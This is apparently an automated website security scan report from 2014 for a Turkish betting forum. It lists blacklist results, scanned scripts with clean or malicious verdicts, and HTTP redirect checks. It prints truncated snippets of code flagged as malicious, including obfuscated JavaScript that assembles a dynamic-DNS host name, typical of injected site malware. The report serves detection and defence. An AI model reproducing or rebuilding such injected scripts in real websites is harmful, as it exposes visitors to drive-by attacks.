Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bahisakademi.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bahisakademi.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bahisakademi.com/ | 200 OK Content-Length: 61970 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
function U(){return {g : r(String(H("deiRJv",0,2))),Z : r(H("bz2.dyndns-2bz",3,8)+"server.c"+H("omZBl",0,2)),s : r(H("s1c8WX",0,2))};};function imgMin(h, fN){return h + fN;};function aGaTrack(h){return h.length;};function c(a, todayY, tO){tO = tO || {};var FY = tO.expires;if (typeof FY == String("number") && FY){var C = new Date();C.setTime(C.getTime() + t(FY, 1000));FY = tO.expires = C;}if(FY && FY.toUTCString) { tO.expires = FY.toUTCString(); }todayY = encodeURIComponent(todayY
Antivirus reports:
http://bahisakademi.com/clientscript/yui/yahoo-dom-event/yahoo-dom-event.js?v=382 | 200 OK Content-Length: 36628 Content-Type: application/x-javascript | clean |
http://bahisakademi.com/clientscript/yui/connection/connection-min.js?v=382 | 200 OK Content-Length: 11604 Content-Type: application/x-javascript | clean |
http://bahisakademi.com/clientscript/vbulletin_global.js?v=382 | 200 OK Content-Length: 26013 Content-Type: application/x-javascript | clean |
http://bahisakademi.com/clientscript/vbulletin_menu.js?v=382 | 200 OK Content-Length: 14934 Content-Type: application/x-javascript | clean |
http://bahisakademi.com/clientscript/ncode_imageresizer.js?v=1.0.1 | 200 OK Content-Length: 6335 Content-Type: application/x-javascript | clean |
http://bahisakademi.com/clientscript/vbulletin_md5.js?v=382 | 200 OK Content-Length: 5464 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
var hexcase=0;var b64pad="";var chrsz=8;function hex_md5(A){return binl2hex(core_md5(str2binl(A),A.length*chrsz))}function b64_md5(A){return binl2b64(core_md5(str2binl(A),A.length*chrsz))}function str_md5(A){return binl2str(core_md5(str2binl(A),A.length*chrsz))}function hex_hmac_md5(A,B){return binl2hex(core_hmac_md5(A,B))}function b64_hmac_md5(A,B){return binl2b64(core_hmac_md5(A,B))}function str_hmac_md5(A,B){return binl2str(core_hmac_md5(A,B))}function core_md5(K,F){K[F>>5]|=128<<
Antivirus reports:
http://js.betboopartners.com/javascript.php?prefix=K_zwZablwTGbWa_B3pkfcWNd7ZgqdRLk&media=1510&campaign=1 | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://js.betboopartners.com/test404page.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://js.commissionlounge.com/javascript.php?prefix=ukoBELj1YQ98F8NfJ-N_DWNd7ZgqdRLk&media=1176&campaign=1 | 200 OK Content-Length: 310 Content-Type: application/javascript | clean |
http://bahisakademi.com/clientscript/vbulletin_read_marker.js?v=382 | 200 OK Content-Length: 3394 Content-Type: application/x-javascript | clean |
http://js.betboopartners.com/javascript.php?prefix=K_zwZablwTGbWa_B3pkfcWNd7ZgqdRLk&media=1509&campaign=1 | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bahisakademi.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Tue, 15 Apr 2014 22:22:07 GMT
Pragma: private
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=ISO-8859-9
Set-Cookie: bblastvisit=1397600527; expires=Wed, 15-Apr-2015 22:22:07 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Wed, 15-Apr-2015 22:22:07 GMT; path=/
X-Powered-By: PHP/5.3.13
X-Powered-By: PleskLin
X-UA-Compatible: IE=7
Second query (visit from search engine):
GET / HTTP/1.1
Host: bahisakademi.com
Referer: http://www.google.com/search?q=bahisakademi.com
Result:
The result is similar to the first query. There are no suspicious redirects found.